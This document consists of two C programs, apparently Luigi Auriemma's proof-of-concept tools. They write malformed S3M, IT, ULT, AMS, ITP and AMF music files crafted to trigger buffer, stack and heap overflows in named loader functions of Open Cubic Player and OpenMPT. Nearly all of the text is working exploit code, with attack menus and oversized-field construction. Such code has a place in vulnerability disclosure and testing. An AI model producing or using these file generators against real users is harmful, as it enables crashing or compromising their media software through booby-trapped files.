int main(int argc, char *argv[]) { FILE *fd; s3m_t s3m; it_t it; ams_t ams; int i, j, tmp, attack; char *fname; setbuf(stdout, NULL); fputs("\n" "Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <output_file>\n" "\n" "Attacks:\n" " 1 = buffer-overflow in mpLoadS3M (*.S3M)\n" " 2 = buffer-overflow in itload.cpp (*.IT)\n" " 3 = buffer-overflow in mpLoadULT (*.ULT)\n" " 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n" "\n", argv[0]); exit(1); } attack = atoi(argv[1]); fname = argv[2]; printf("- create file %s\n", fname); fd = fopen(fname, "wb"); if(!fd) std_err(); if(attack == 1) { memset(&s3m, 0, sizeof(s3m)); strncpy(s3m.name, POCNAME, sizeof(s3m.name)); s3m.kennung = 0x1a; s3m.typ = 16; s3m.ordnum = 800; memcpy(s3m.scrm, "SCRM", 4); fwrite(&s3m, sizeof(s3m), 1, fd); for(i = 0; i < s3m.ordnum - 1; i++) fputc('a', fd); fputc(0, fd); // for forcing "return errFormMiss" } else if(attack == 2) { memset(&it, 0, sizeof(it)); memcpy(it.sign, "IMPM", 4); strncpy(it.name, POCNAME, sizeof(it.name)); it.Cmwt = 0x200; it.OrdNum = 1000; // buffer-overflow // it.InsNum = 200; // buffer-overflow fwrite(&it, sizeof(it), 1, fd); for(i = 0; i < 64; i++) fwi08(fd, 0); for(i = 0; i < 64; i++) fwi08(fd, 0); for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a'); for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a'); for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a'); for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a'); } else if(attack == 3) { fwmem(fd, "MAS_UTrack_V00", 14); fwi08(fd, 3 + '1'); fwstx(fd, POCNAME, 32); fwi08(fd, 0); // msglen fwi08(fd, 0); // insnum fwbof(fd, 256, 0); // orders tmp = 0x7f; fwi08(fd, tmp); // chnn fwi08(fd, 0); // patn fwbof(fd, tmp, 'a'); // buffer-overflow // possible heap overflow with chbp, patlength = 0 } else if(attack == 4) { fwmem(fd, "AMShdr\x1A", 7); // sig fwi08(fd, AMSNAMELEN); // sig[7] fwbof(fd, AMSNAMELEN, 'a'); // name fwi16(fd, 0x202); // filever memset(&ams, 0, sizeof(ams)); ams.ins = 1; fwrite(&ams, sizeof(ams), 1, fd); for(j = 0; j < ams.ins; j++) { fwi08(fd, AMSNAMELEN); // namelen fwbof(fd, AMSNAMELEN, 'a'); // name fwi08(fd, 1); // smpnum fwbof(fd, 120, 0); // samptab for(i = 0; i < 3; i++) { // envs tmp = 0xff; fwi08(fd, 0); // speed fwi08(fd, 0); // sustain fwi08(fd, 0); // loopstart fwi08(fd, 0); // loopend fwi08(fd, tmp); // points fwbof(fd, tmp * 3, 'a'); } } } else { printf("\nError: you must specify the right attack number\n"); } fclose(fd); printf("- finished\n"); return(0); }
int main(int argc, char *argv[]) { amf_head_t amf_head; amf_smp_t amf_smp; FILE *fd; int i, attack; char *fname; setbuf(stdout, NULL); fputs("\n" "OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <attack> <output_file>\n" "\n" "Attacks:\n" " 1 = various global buffer overflows in ReadITProject (*.ITP)\n" " 2 = heap overflow in ReadSample (*.AMF)\n" "\n", argv[0]); exit(1); } attack = atoi(argv[1]); fname = argv[2]; printf("- create file %s\n", fname); fd = fopen(fname, "wb"); if(!fd) std_err(); if(attack == 1) { fwi32(fd, 0x2e697470); // .itp fwi32(fd, 0x00000000); // version fwi32(fd, ITPHEAPOVERSZ); // song name len fwbof(fd, ITPHEAPOVERSZ, 'a'); // song name fwi32(fd, 0); // comments len fwi32(fd, SONG_ITPROJECT); // m_dwSongFlags fwi32(fd, 128); // m_nDefaultGlobalVolume fwi32(fd, 0); // m_nSongPreAmp fwi32(fd, 0); // m_nDefaultSpeed fwi32(fd, 0); // m_nDefaultTempo fwi32(fd, 0); // m_nChannels fwi32(fd, 0); // channel name len // for(i=0; i<m_nChannels; i++){ fwi32(fd, 0); // LoadMixPlugins len fwi32(fd, 0); // m_MidiCfg len fwi32(fd, 0); // m_nInstruments fwi32(fd, 0); // path instruments len fwi32(fd, 0); // order len fwi32(fd, 0); // number of patterns fwi32(fd, 0); // m_nPatternNames fwi32(fd, 0); // m_lpszPatternNames len fwi32(fd, 0); // modcommand data length fwi32(fd, 0); // m_nSamples fwi32(fd, 0); // Read number of embeded samples } else if(attack == 2) { memset(&amf_head, 0, sizeof(amf_head)); memset(&amf_smp, 0, sizeof(amf_smp)); strcpy(amf_head.sign, "ASYLUM Music Format V1.0"); amf_head.patterns = 1; amf_head.orders = 1; fwrite(&amf_head, sizeof(amf_head), 1, fd); for(i = 0; i < 64; i++) { sprintf(amf_smp.name, "sample %d", i); amf_smp.finetune = 0; amf_smp.volume = 64; amf_smp.length = ((0 - 6) - 39) + 16; // ReadSample and AllocateSample amf_smp.reppos = 0; amf_smp.replen = 0; fwrite(&amf_smp, sizeof(amf_smp), 1, fd); } fwbof(fd, 64 * 32, 0x00); fwbof(fd, ALLOCSAMPLESZ + HEAPOVERSZ, 'a'); } fclose(fd); printf("- finished\n"); return(0); }